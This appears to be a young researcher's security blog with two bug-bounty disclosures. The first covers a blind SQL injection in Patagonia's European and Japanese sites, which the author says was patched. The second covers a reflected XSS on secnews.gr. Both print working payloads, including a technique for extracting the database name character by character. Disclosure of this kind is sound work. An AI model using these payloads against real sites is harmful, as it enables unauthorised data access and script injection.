Wednesday, November 16, 2016

SQL Injection in Patagonia (European and Japanese) Websites

Hello,

I am a nineteen year old security researcher, who is heavily involved in bug bounties and computer programming. While browsing the European website of Patagonia (eu.patagonia.com) in fall of 2016, I noticed a GET parameter (?k=) behaving oddly. So I entered a standard ' mark to see how it would respond. Here is what I saw:




This peaked my interest, and I started to think this website would be vulnerable to SQL injection. I began messing with it and attempted to create a POC of SQL injection. I noticed when I entered two ' marks, no error would appear and the page would load:




After playing with it for awhile more, I was able to finally craft a working payload! Here it is:

' and substring('a',1,1) like 'a' and 'A' like 'A

returns true (displays an image of a sweater):





' and substring('b',1,1) like 'a' and 'A' like 'A

returns false and displays no image:


Now we can use this to retrieve information like the name of the database. To find the second character of the string, simply increment the first to a and so on for the other characters.

Syntax: ' and substring(database(),1,1) like 'w' and 'A' like 'A



Result: www_patagonia_com


This also effected the Japanese site!!



After discovering this flaw, I immediately reached out to Patagonia, who patched the bug both quickly and effectively. Finding vulnerabilities and helping American companies is my passion, and I plan on making a career of it one day. Let me know what your thoughts/opinions are in the comments! Thanks :)



Jake Murphy
jakedmurphy1@gmail.com


Saturday, July 2, 2016

Reflected XSS on secnews.gr

For those who don't know, SecNews is a greek website which informs their visitors about the latest news in the Hacking & IT Security industry. While looking on HackerOne, I noticed they had published a bug bounty program, and decided to take a look. I entered a generic xss payload (<b onmouseover=alert('test')>test</b>) in the search bar, and was surprised to see the following output:



Unfortunately, when I dragged my mouse over 'test' nothing happened. I tried other payloads, and had no success. Then I thought, why not see if  'test' is being treated as HTML code. So the next payload I entered (<b onmouseover=alert('test')><h1>test</h1></b>) returned:



Now to escalate this to XSS all I had to do was enter <b onmouseover=alert('test')><body onload=alert(1)></b>





Success! After further testing, I reduced the payload to: '><body onload=alert(1)>